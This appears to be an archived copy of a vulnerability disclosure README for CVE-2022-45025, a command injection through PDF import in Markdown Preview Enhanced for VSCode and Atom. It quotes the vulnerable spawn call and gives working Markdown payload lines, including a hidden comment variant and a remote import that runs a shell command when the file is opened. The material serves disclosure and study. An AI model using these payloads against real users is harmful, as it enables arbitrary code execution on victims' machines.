Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2022-45025 PoC — Markdown Preview Enhanced 操作系统命令注入漏洞

Source
https://github.com/yuriisanin/CVE-2022-45025
Associated Vulnerability
Title:Markdown Preview Enhanced 操作系统命令注入漏洞 (CVE-2022-45025)
Description:Markdown Preview Enhanced是Yiyi Wang个人开发者的一个超级强大标记扩展。 Markdown Preview Enhanced v0.6.5版本、v0.19.6版本存在操作系统命令注入漏洞。攻击者利用该漏洞通过PDF文件导入功能执行命令注入。
Description
[PoC] Command injection via PDF import in Markdown Preview Enhanced (VSCode, Atom)
Readme
# CVE-2022-45025
Command injection via PDF import in Markdown Preview Enhanced ([VSCode](https://marketplace.visualstudio.com/items?itemName=shd101wyy.markdown-preview-enhanced), [Atom](https://atom.io/packages/markdown-preview-enhanced))

## Description

The [Mume](https://github.com/shd101wyy/mume) markdown tool library was vulnerable to command injection due to use of `spawn` command with `{shell: true}` option. This could allow an attacker to achieve arbitary code execution by tricking victim into opening specially crafted Markdown file using VSCode or Atom. The library powers Markdown Preview Enhanced plugin for both [VSCode](https://github.com/shd101wyy/vscode-markdown-preview-enhanced) and [Atom](https://github.com/shd101wyy/markdown-preview-enhanced).


Vulnerable [code snippet](https://github.com/shd101wyy/mume/blob/7135d7606a6a57de6e2372c26a2f16bb98ecf2b2/src/pdf.ts):
```js
const task = spawn(
      "pdf2svg",
      [
        `"${pdfFilePath}"`,
        `"${path.resolve(svgDirectoryPath, svgFilePrefix + "%d.svg")}"`,
        "all",
      ],
      { shell: true },
    )
```

## Proof of Concept

The following Markdown document allows an attacker to execute arbitary command:

```md
@import "$(open -a Calculator > /dev/null | exit 0)hello.pdf"

The following comment will be recognised by MPE as valid "@import" command:

<!-- @import "$(open -a Calculator > /dev/null | exit 0)hello.pdf" -->
```

Alternatively, the payload could be executed from external source:
```md
<!-- @import "https://raw.githubusercontent.com/yuriisanin/CVE-2022-45025/main/examples/malicious.md" -->
```

**DEMO for both [VSCode](https://www.youtube.com/watch?v=bnK5DPdb5JU) and [Atom](https://www.youtube.com/watch?v=WxMVwkYrDzI) on YouTube.**

![vscode-rce-poc-gif](https://github.com/yuriisanin/CVE-2022-45025/blob/c60ece758e623176bc21461ef93604efa15d4e63/assets/mde-rce-short.gif)


## Support

You can follow me on [Twitter](https://twitter.com/SaninYurii), [GitHub](https://github.com/yuriisanin) or [YouTube](https://www.youtube.com/channel/UCLN2EvGxtnucEdrI21PmJZg).
File Snapshot

 [4.0K]  /data/pocs/9a365cba0f29eb3f83ff6c1b7501abb962dfc243
├── [4.0K]  assets
│   └── [3.1M]  mde-rce-short.gif
├── [4.0K]  examples
│   └── [ 106]  malicious.md
└── [2.0K]  README.md

2 directories, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.